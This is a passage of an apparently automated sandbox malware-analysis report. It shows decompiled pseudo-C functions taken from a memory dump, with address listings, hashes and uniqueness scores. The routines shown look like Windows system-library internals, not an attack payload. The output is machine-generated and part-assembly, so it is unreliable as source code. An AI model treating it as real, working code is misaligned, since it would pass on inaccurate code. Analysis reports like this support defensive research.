				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x185d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01799ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E017AB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01838A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01799702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x185b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                              0x01780055
                                                                              0x0178005d
                                                                              0x01780062
                                                                              0x0178006c
                                                                              0x0178006f
                                                                              0x01780074
                                                                              0x0178007a
                                                                              0x0178007a
                                                                              0x01780080
                                                                              0x01780080
                                                                              0x01780087
                                                                              0x0178008d
                                                                              0x0178008f
                                                                              0x01780093
                                                                              0x01780095
                                                                              0x0178009b
                                                                              0x017800f8
                                                                              0x017800fb
                                                                              0x017800fc
                                                                              0x017800ff
                                                                              0x01780108
                                                                              0x01780108
                                                                              0x017800a2
                                                                              0x017800a6
                                                                              0x017800b3
                                                                              0x017800bc
                                                                              0x017800c5
                                                                              0x017800ca
                                                                              0x017cc01e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017cc02d
                                                                              0x017800d5
                                                                              0x017800d9
                                                                              0x017cc03d
                                                                              0x017cc046
                                                                              0x017cc046
                                                                              0x017800df
                                                                              0x017800e2
                                                                              0x017800ea
                                                                              0x017800ef
                                                                              0x017800f2
                                                                              0x017800f6
                                                                              0x01780111
                                                                              0x01780117
                                                                              0x01780117
                                                                              0x00000000
                                                                              0x017800f6
                                                                              0x017800d0
                                                                              0x017800d0
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a645faf9b8b3b19c607080fe9c5694db7d49fb80426ef80d1480194dcb1f73ba
                                                                              • Instruction ID: 2fd01fe4022b7d5c123e9829bb0a67edc65f79bb675fba168c158c7e290657d8
                                                                              • Opcode Fuzzy Hash: a645faf9b8b3b19c607080fe9c5694db7d49fb80426ef80d1480194dcb1f73ba
                                                                              • Instruction Fuzzy Hash: D531BD31241B04CFD722DF28C844B9AF7E5FF89714F1446ADE59A87B90EB35A806CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017E6C0A Relevance: .1, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 77%
                                                                              			E017E6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E01787D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1857b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L01784620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E017AF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E01787D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E017A9AE0();
						_t23 = L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                              0x017e6c0a
                                                                              0x017e6c0f
                                                                              0x017e6c10
                                                                              0x017e6c13
                                                                              0x017e6c15
                                                                              0x017e6c19
                                                                              0x017e6c1c
                                                                              0x017e6c21
                                                                              0x017e6c28
                                                                              0x017e6c3a
                                                                              0x017e6c2a
                                                                              0x017e6c33
                                                                              0x017e6c33
                                                                              0x017e6c3f
                                                                              0x017e6c48
                                                                              0x017e6c4d
                                                                              0x017e6c60
                                                                              0x017e6c65
                                                                              0x017e6c69
                                                                              0x017e6c73
                                                                              0x017e6c79
                                                                              0x017e6c7f
                                                                              0x017e6c86
                                                                              0x017e6c90
                                                                              0x017e6c94
                                                                              0x017e6ca6
                                                                              0x017e6cb2
                                                                              0x017e6cbd
                                                                              0x017e6cbd
                                                                              0x017e6cc3
                                                                              0x017e6cc7
                                                                              0x017e6ccb
                                                                              0x017e6cd0
                                                                              0x017e6cd1
                                                                              0x017e6ce2
                                                                              0x017e6ce2
                                                                              0x017e6c69
                                                                              0x017e6ced

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 78bb1aeaecbb524e2edc426901f61d49bc085c2805bf4df9ca71718d4b76f2a4
                                                                              • Instruction ID: 8ead54c865c390c6e2c16f624a8e8d3c01ff63280a44ae86f6531fb44d486fae
                                                                              • Opcode Fuzzy Hash: 78bb1aeaecbb524e2edc426901f61d49bc085c2805bf4df9ca71718d4b76f2a4
                                                                              • Instruction Fuzzy Hash: 81219A71A00645ABD715DF68D888F2AB7E8FF58700F1400A9F905C77A0D634E950CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A90AF Relevance: .1, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E017A90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E017BD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0179E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01784620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E017AF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0179A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                              0x017a90af
                                                                              0x017a90b8
                                                                              0x017a90bb
                                                                              0x017a90bf
                                                                              0x017a90c2
                                                                              0x017a90c2
                                                                              0x017a90c8
                                                                              0x017a90cb
                                                                              0x017a90cd
                                                                              0x017e14d7
                                                                              0x017e14eb
                                                                              0x017e14eb
                                                                              0x00000000
                                                                              0x017e14eb
                                                                              0x017e14db
                                                                              0x017e14e6
                                                                              0x00000000
                                                                              0x017e14f2
                                                                              0x017e14e8
                                                                              0x00000000
                                                                              0x017e14e8
                                                                              0x017a90d8
                                                                              0x017a90da
                                                                              0x017a90dd
                                                                              0x017a90e5
                                                                              0x00000000
                                                                              0x017a9139
                                                                              0x017a90fa
                                                                              0x017a90fe
                                                                              0x017a9142
                                                                              0x00000000
                                                                              0x017a9142
                                                                              0x017a9104
                                                                              0x017a9107
                                                                              0x017a910b
                                                                              0x017a9110
                                                                              0x017a9118
                                                                              0x017a9147
                                                                              0x017a9148
                                                                              0x017a914f
                                                                              0x017a9150
                                                                              0x017a9151
                                                                              0x017a9152
                                                                              0x017a9156
                                                                              0x017a915d
                                                                              0x017a9160
                                                                              0x017a9168
                                                                              0x017a916c
                                                                              0x017a91bc
                                                                              0x017a91be
                                                                              0x00000000
                                                                              0x017a91be
                                                                              0x017a916e
                                                                              0x017a9173
                                                                              0x017a9176
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017a917c
                                                                              0x017a9180
                                                                              0x017a91b5
                                                                              0x00000000
                                                                              0x017a91b5
                                                                              0x017a9182
                                                                              0x017a9185
                                                                              0x017a9189
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017a918e
                                                                              0x017a9190
                                                                              0x017a9198
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017a91a0
                                                                              0x00000000
                                                                              0x017a91ad
                                                                              0x017a91ad
                                                                              0x017a91b0
                                                                              0x017a91b1
                                                                              0x00000000
                                                                              0x017a9185
                                                                              0x017a911a
                                                                              0x017a911c
                                                                              0x017a911f
                                                                              0x017a9125
                                                                              0x017a9127
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                              • Instruction ID: febd893b73c4320e9616c84cf4ab4ced9741babd01adb55b6cb0435e4599d046
                                                                              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                              • Instruction Fuzzy Hash: E2219571A00205EFDB21DF59C844E9AFBF8EB94354F54856EEA4597200D330ED10CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01793B7A Relevance: .1, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 59%
                                                                              			E01793B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x18584c4; // 0x0
				_v12 = 1;
				_v8 =  *0x18584c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x18584c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E017AAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E017AFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x18584c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x18584c4; // 0x0
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                              0x01793b89
                                                                              0x01793b96
                                                                              0x01793ba1
                                                                              0x01793bab
                                                                              0x01793bb5
                                                                              0x01793bb9
                                                                              0x017d6298
                                                                              0x01793bbf
                                                                              0x01793bc2
                                                                              0x01793bc3
                                                                              0x01793bc9
                                                                              0x01793bca
                                                                              0x01793bcc
                                                                              0x01793bcd
                                                                              0x01793bd4
                                                                              0x01793bd6
                                                                              0x01793bdb
                                                                              0x01793bea
                                                                              0x01793bf7
                                                                              0x01793bfb
                                                                              0x01793bff
                                                                              0x01793c09
                                                                              0x01793c0a
                                                                              0x01793c0b
                                                                              0x01793c0f
                                                                              0x01793c14
                                                                              0x01793c18
                                                                              0x01793c18
                                                                              0x01793bfb
                                                                              0x01793c1b
                                                                              0x01793c30
                                                                              0x01793c30
                                                                              0x01793c3d

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8f33325c5444d1b2fe5e9bc1c3b0e2e210376dea321b120cd9a97c4d12ba61c5
                                                                              • Instruction ID: f76966ce302ebc5726031b8d71f932f8915e2a4b695c31cac9337277e92db88c
                                                                              • Opcode Fuzzy Hash: 8f33325c5444d1b2fe5e9bc1c3b0e2e210376dea321b120cd9a97c4d12ba61c5
                                                                              • Instruction Fuzzy Hash: 7121D472600109AFCB10DF98DD81F6AFBBDFB41308F150069EA05AB251D375EE05CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017E6CF0 Relevance: .1, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E017E6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E01787D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E01787D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1745c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0179F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0179F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E017E7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L01782400( &_v52);
								}
								_t21 = L01782400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                              0x017e6cfb
                                                                              0x017e6d00
                                                                              0x017e6d02
                                                                              0x017e6d06
                                                                              0x017e6d0a
                                                                              0x017e6d0e
                                                                              0x017e6d19
                                                                              0x017e6d2b
                                                                              0x017e6d1b
                                                                              0x017e6d24
                                                                              0x017e6d24
                                                                              0x017e6d33
                                                                              0x017e6d39
                                                                              0x017e6d46
                                                                              0x017e6d4f
                                                                              0x017e6d61
                                                                              0x017e6d51
                                                                              0x017e6d5a
                                                                              0x017e6d5a
                                                                              0x017e6d69
                                                                              0x017e6d6b
                                                                              0x017e6d6d
                                                                              0x017e6d6f
                                                                              0x017e6d6f
                                                                              0x017e6d74
                                                                              0x017e6d79
                                                                              0x017e6d7a
                                                                              0x017e6d7f
                                                                              0x017e6d82
                                                                              0x017e6d88
                                                                              0x017e6d89
                                                                              0x017e6d90
                                                                              0x017e6d94
                                                                              0x017e6da7
                                                                              0x017e6db1
                                                                              0x017e6db1
                                                                              0x017e6dbb
                                                                              0x017e6dbb
                                                                              0x017e6d90
                                                                              0x017e6d69
                                                                              0x017e6d46
                                                                              0x017e6dc6

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ed37ac6bb6bc7fd10e0902c501c4ef646d52185213943115ad1be1f206d6117a
                                                                              • Instruction ID: 83f3e4e0358852e17ae6f5da9656992e9da84584c31b086f67e79fd183daba13
                                                                              • Opcode Fuzzy Hash: ed37ac6bb6bc7fd10e0902c501c4ef646d52185213943115ad1be1f206d6117a
                                                                              • Instruction Fuzzy Hash: 4D2122724007499BDB11EF2CC94CB6BFBECAFA5240F440466FA40C7251E732C988C6A2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0183070D Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 67%
                                                                              			E0183070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E018307DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0182AFDE( &_v8,  &_v12);
					E01831293(_t38, _v28, _t60);
					if(E01787D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E018214FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                              0x0183071b
                                                                              0x01830724
                                                                              0x01830734
                                                                              0x01830738
                                                                              0x0183074b
                                                                              0x0183074b
                                                                              0x01830753
                                                                              0x01830753
                                                                              0x01830759
                                                                              0x0183075d
                                                                              0x01830774
                                                                              0x01830779
                                                                              0x0183077d
                                                                              0x01830789
                                                                              0x01830795
                                                                              0x018307a7
                                                                              0x01830797
                                                                              0x018307a0
                                                                              0x018307a0
                                                                              0x018307af
                                                                              0x018307c4
                                                                              0x018307cd
                                                                              0x018307cd
                                                                              0x018307af
                                                                              0x018307dc

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                              • Instruction ID: ab160f4e14340c98bc863d53441a56455164ff59f268b0a85af1356cb9088b34
                                                                              • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                              • Instruction Fuzzy Hash: 8A2126362042049FD716DF1CC884F6ABBA5EFD4750F088569F995CB385DB70DA09CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017E7794 Relevance: .1, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E017E7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1857b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E017AF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E01787D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E017A9AE0();
					_t24 = L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                              0x017e7799
                                                                              0x017e779a
                                                                              0x017e779b
                                                                              0x017e77a3
                                                                              0x017e77ab
                                                                              0x017e77ae
                                                                              0x017e77b1
                                                                              0x017e77b1
                                                                              0x017e77bf
                                                                              0x017e77c4
                                                                              0x017e77c8
                                                                              0x017e77ce
                                                                              0x017e77d4
                                                                              0x017e77e0
                                                                              0x017e77e0
                                                                              0x017e77d6
                                                                              0x017e77d6
                                                                              0x017e77de
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017e77de
                                                                              0x017e77e5
                                                                              0x017e77f0
                                                                              0x017e77f3
                                                                              0x017e77f6
                                                                              0x017e77fd
                                                                              0x017e7800
                                                                              0x017e780c
                                                                              0x017e7818
                                                                              0x017e782b
                                                                              0x017e781a
                                                                              0x017e7823
                                                                              0x017e7823
                                                                              0x017e7830
                                                                              0x017e7831
                                                                              0x017e7838
                                                                              0x017e783d
                                                                              0x017e783e
                                                                              0x017e784f
                                                                              0x017e784f
                                                                              0x017e785a

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d490b666040d57f074d2f3b71d281c477f68e9f7192ad9d7b7a6238f814c535d
                                                                              • Instruction ID: 6f66bbc0bef13ed8173542caf4133d031569d5e36d13685895c6709cd49770af
                                                                              • Opcode Fuzzy Hash: d490b666040d57f074d2f3b71d281c477f68e9f7192ad9d7b7a6238f814c535d
                                                                              • Instruction Fuzzy Hash: CC219D72940604EBC729DF69D898E6BBBE9EF8C340F10456DE60AC7650E634E900CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0178AE73 Relevance: .1, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 96%
                                                                              			E0178AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E01787D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E01787D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E01787D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E01787D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E017E7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                              0x0178ae78
                                                                              0x0178ae7c
                                                                              0x0178ae7e
                                                                              0x0178ae81
                                                                              0x0178ae86
                                                                              0x0178ae8d
                                                                              0x017d2691
                                                                              0x0178ae93
                                                                              0x0178ae93
                                                                              0x0178ae93
                                                                              0x0178ae98
                                                                              0x0178ae9d
                                                                              0x017d26a2
                                                                              0x017d26b4
                                                                              0x017d26a4
                                                                              0x017d26ad
                                                                              0x017d26ad
                                                                              0x017d26b9
                                                                              0x00000000
                                                                              0x017d26bb
                                                                              0x00000000
                                                                              0x017d26bb
                                                                              0x0178aea3
